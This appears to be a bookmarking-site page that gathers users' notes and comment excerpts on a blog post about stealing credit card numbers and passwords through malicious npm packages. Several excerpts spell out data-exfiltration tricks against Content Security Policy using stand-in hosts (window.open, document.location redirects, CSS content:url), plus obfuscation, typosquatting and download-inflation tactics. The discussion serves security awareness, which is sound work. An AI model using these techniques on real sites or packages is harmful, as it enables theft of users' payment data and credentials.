I’m harvesting credit card numbers and passwords from your site. Here’s how.


301 bookmarks. First posted by sptz45 january 2018.


推荐一篇文章《如何通过 npm 窃取信用卡密码?》,讲述了作者通过 npm 发布恶意代码的种种手段。

其中有一个技巧,就是package.js 与 package.min.js 的代码不同,恶意代码只放在后者。
from twitter_favs
9 weeks ago by quake0day
Extremely legit concern.

Comments:

* npm package compromises did happen, e.g.
* https://github.com/conventional-changelog/conventional-changelog/issues/282#issuecomment-365367804
* https://www.bleepingcomputer.com/news/security/somebody-tried-to-hide-a-backdoor-in-a-popular-javascript-npm-package/
* https://www.theregister.co.uk/2017/08/02/chrome_web_developer_extension_hacked/

* Any way to prevent outgoing connections through
`window.open(‘https://legit-analytics.com?q=${payload}', ‘_blank’).close()` with CSP?
A: Wow, didn’t think of that and no, I don’t know if CSP can prevent that.

* "Not just NPM… Think of Joomla extensions or WordPress plugins. A nice way to compromise millions of “traditional” PHP based websites"

* "It isn’t that far from the truth. Something similar is happening already: https://blog.sucuri.net/2017/10/credit-card-stealer-investigation-uncovers-malware-ring.html"

* "Typosquatting attacks apply to any software dependency not just open source and not just npm. Malicious submissions happen in the walled garden Apple App Store and Google Play stores, but since they hold moderation capability centrally and have a large volume of paid staffers, they can do something about it faster than volunteers typically do. A fake WhatsApp app on Google Play store was downloaded by more than 1 million people before it was taken down.

This is definitely a conversation we need to have.

Surprised there was no mention of delayed attacks (e.g., gain trust, gain users, then inject malicious changes in a future version).

Another variation on this would be to approach maintainers (say 10k+ download Firefox or Chrome extension authors, or WordPress authors) and offer them a “custom” advertising program if they just install your code you pay them… maybe your ads seem easy or exceptionally non-intrusive, but that’s because the ads are not the true goal."

* "This is scary and let’s not forget the server side.
Node.js is becoming popular on the server side and backend developers are also using a lot of NPM dependencies without vetting them thoroughly.
For example an Express middleware module should be able to gather the same data and forward it wherever (…and there are a lot of Express middleware modules in the NPM repository).

Although there are perhaps more possibilities on the server side to prevent malicious code from communicating back (for example using network limitations) — I wouldn’t be surprised if most front facing Node.js servers had little limitations to what Internet hosts they could communicate with."

* "you could use webrtc datachannels for sending out data.. it is not affected by CSP at all .. yet..

https://github.com/w3c/webappsec-csp/issues/92"

* "At the end of the day, if you can do document.location = https://evil-server.com/bounce?q=data (e.g. in a form submit event) and bounce back to the original site quickly enough, you can get data out."

* "If the CSP doesn’t define a style-src you could use insertRule to add some css.
e.g. something::after { content:url(“evilserver.com/userdatastring”) }"

* "Yeah, Google Tag Manager scripts are super-dangerous, it’s so easy for someone to push a nasty script targeted at your site one day, then remove it the next."

* Chrome extensions with "Access data on all sites you visit" can easily swap crypto addresses on exchange sites with their own.

* "About npm, I’d add that an easy way to increase the level of trust of a package is to release many ‘patch’ versions per day. This artificially increases the number of downloads, because of the tons of services spending their time to spot package updates (CI tools, stats services and others)."
JavaScript  code  injection  attack  hack  security  against  npm  open-source 
10 weeks ago by dandv
The following is a true story. Or maybe it’s just based on a true story. Perhaps it’s not true at all. It’s been a frantic week of security scares — it seems like every day there’s a new…
adam  package.json  npm 
10 weeks ago by blurback
Describes a speculative attack that CSP should help defend against.

n.b. this article also describes a variation using prefetch that can sneak past CSP.
csp  security  prefetch 
10 weeks ago by wrumsby
The following is a true story. Or maybe it’s just based on a true story. Perhaps it’s not true at all. It’s been a frantic week of security scares — it seems like every day there’s a new vulnerability.
Archive 
12 weeks ago by pesche
via Pocket - I’m harvesting credit card numbers and passwords from your site. Here’s how. - Added May 30, 2018 at 10:46PM
IFTTT  Pocket 
june 2018 by BastiRe
The following is a true story. Or maybe it’s just based on a true story. Perhaps it’s not true at all. It’s been a frantic week of security scares — it seems like every day there’s a new vulnerability.
may 2018 by gzhihao
😱 Read this blog post:

🙏 Now you know why you need this package in your app…
from twitter_favs
may 2018 by nigeljames
If an attacker successfully injects any code at all, it’s pretty much game over

Also the URL looks a lot like the 300 other requests to ad networks your site makes.

The point is, just because you don’t see it, doesn’t mean it’s not happening. It’s been more than two years and as far as I know, no one has ever noticed one of my requests. Maybe it’s been in your site this whole time :)

I only send these requests intermittently (about one in seven times, lightly randomised — the ideal trouble-shooting-insanity-inducing frequency).
cybersecurity  javascript  obfuscation  password  creditcard  fear  story  browser  plugin  malvertising 
may 2018 by bwiese
NPM as attack vector:
from twitter
march 2018 by brookr
Great article man.

var i = ‘gfudi’;
var k = s => s.split(‘’).map(c => String.fromCharCode(c.charCodeAt() — 1)).join(‘’);
Security  hacking  Javascript  Interview 
march 2018 by hackerzhut
The following is a true story. Or maybe it’s just based on a true story. Perhaps it’s not true at all. It’s been a frantic week of security scares — it seems like every day there’s a new…
march 2018 by nununo
The following is a true story. Or maybe it’s just based on a true story. Perhaps it’s not true at all. It’s been a frantic week of security scares — it seems like every day there’s a new…
security  javascript  webdev  hacks 
march 2018 by lucapostBo
RT : It's probably only a matter of time if it's not happening already.
from twitter_favs
february 2018 by bf4
The following is a true story. Or maybe it’s just based on a true story. Perhaps it’s not true at all.
Web_Security  Security  Computer_Security 
february 2018 by GameGamer43
The following is a true story. Or maybe it’s just based on a true story. Perhaps it’s not true at all. It’s been a frantic week of security scares — it seems like every day there’s a new…
maninthemiddle  security  data  harvesting  prevention 
february 2018 by gilberto5757
Lucky for me, we live in an age where people install npm packages like they’re popping pain killers.
security  javascript  node.js 
february 2018 by jbrewer999
This has been making the rounds but you should read it and then weep in a corner with the mess we've made.
from twitter_favs
january 2018 by pixelnated
The following is a true story. Or maybe it’s just based on a true story. Perhaps it’s not true at all. It’s been a frantic week of security scares — it seems like every day there’s a new…
security  javascript  web 
january 2018 by dstelow
A modern-day "on trusting trust".
javascript  security  npm  web 
january 2018 by dagh
The following is a true story. Or maybe it’s just based on a true story. Perhaps it’s not true at all. It’s been a frantic week of security scares — it seems like every day there’s a new vulnerability.
january 2018 by pitiphong_p
Weak web technologies
security  javascript  web  npm  csp  package  hack  via:popular 
january 2018 by rauschen